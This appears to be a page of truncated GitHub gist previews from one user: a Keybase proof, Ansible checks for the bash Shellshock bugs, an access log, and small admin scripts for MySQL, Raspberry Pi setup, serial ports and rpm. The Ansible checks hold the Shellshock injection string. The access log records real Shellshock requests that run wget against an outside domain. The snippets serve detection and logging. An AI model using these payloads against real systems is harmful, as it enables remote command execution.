I hereby claim:
- I am oneiroi on github.
- I am oneiroi (https://keybase.io/oneiroi) on keybase.
- I have a public key whose fingerprint is 1244 78DD E40C FFA1 EFB1 2F2C 22D8 7C7F A34E CF5E
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
- name: Ensure bash is not vulnerable CVE-2014-6271 | |
command: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" | |
register: shellshock | |
failed_when: "'vulnerable' in shellshock.stdout" | |
tags: | |
- CVE | |
- CVE-2014-6271 | |
- name: Ensure bash is not vulnerable CVE-2014-7186 | |
command: bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack" |
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:09 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:11 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJ |
mysql -se "SHOW STATUS LIKE 'Ssl_cipher_list'" | sed 's/:/\n/g' | sed 's/Ssl_cipher_list\s//g' | while read sspec; do SPEC=`openssl ciphers -v "$sspec" 2>/dev/null | grep -v SSLv3 | awk '{print $1}'`; [[ "$sspec" == "$SPEC" ]] && mysql --ssl-cipher=$sspec -e QUIT 2>/dev/null && echo "$sspec OK"; done |
import os, glob, re | |
def main(): | |
p = re.compile('^([0-9a-f]+-[0-9a-f]+)\s[a-z\-]{4}\s[0-9a-f]{8}\s[a-z0-9]{2}\:[a-z0-9]{2}\s[0-9]+\s+(.*)$') | |
smaps = glob.glob('/proc/[0-9]*/smaps') | |
for smap in smaps: | |
lines = open(smap).readlines() | |
for line in lines: | |
m = p.match(line) | |
if m and 'libc' in line: | |
name = open(smap.replace('smaps','status')).readlines()[0] |
#!/bin/sh -e | |
# | |
# rc.local | |
# | |
# This script is executed at the end of each multiuser runlevel. | |
# Make sure that the script will "exit 0" on success or any other | |
# value on error. | |
# | |
# In order to enable or disable this script just change the execution | |
# bits. |
# | |
# ensure CWD contains dirs root and boot | |
# ensure sd card has not automounted elsewhere | |
# ensure ArchARM-rpi2.tgz exists in CWD | |
# ensure partitions configured as per: http://archlinuxarm.org/platforms/armv7/broadcom/raspberry-pi-2 | |
# | |
mkfs.vfat /dev/mmcblk0p1 && \ | |
mount /dev/mmcblk0p1 ./boot && \ | |
mkfs.ext4 /dev/mmcblk0p2 && \ | |
mount /dev/mmcblk0p2 ./root && \ |
while true; do curl -H'User-agent: AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125 Safari/537.36' -s 'http://www.game.co.uk/webapp/wcs/stores/servlet/HubArticleView?hubId=639265&articleId=639266&catalogId=10201&langId=44&storeId=10151&&cm_mmc=Facebook-_-Digital-_-Fallout4-_-Link#NaN' | grep 'Check back later today' || chromium https://www.youtube.com/watch?v=H91rPIq2mN4; sleep 10; done |
#adapted from pySerial examples for use on OSX systems | |
import serial | |
from glob import glob | |
def _scan(): | |
dev_list = glob('/dev/tty*usb*') | |
available = [] | |
for dev in dev_list: | |
try: | |
s = serial.Serial(dev) |
rpm -qa | while read pname; do RES=`rpm -qR $pname`; [[ "$RES" == "" ]] && echo "$pname has no deps"; done |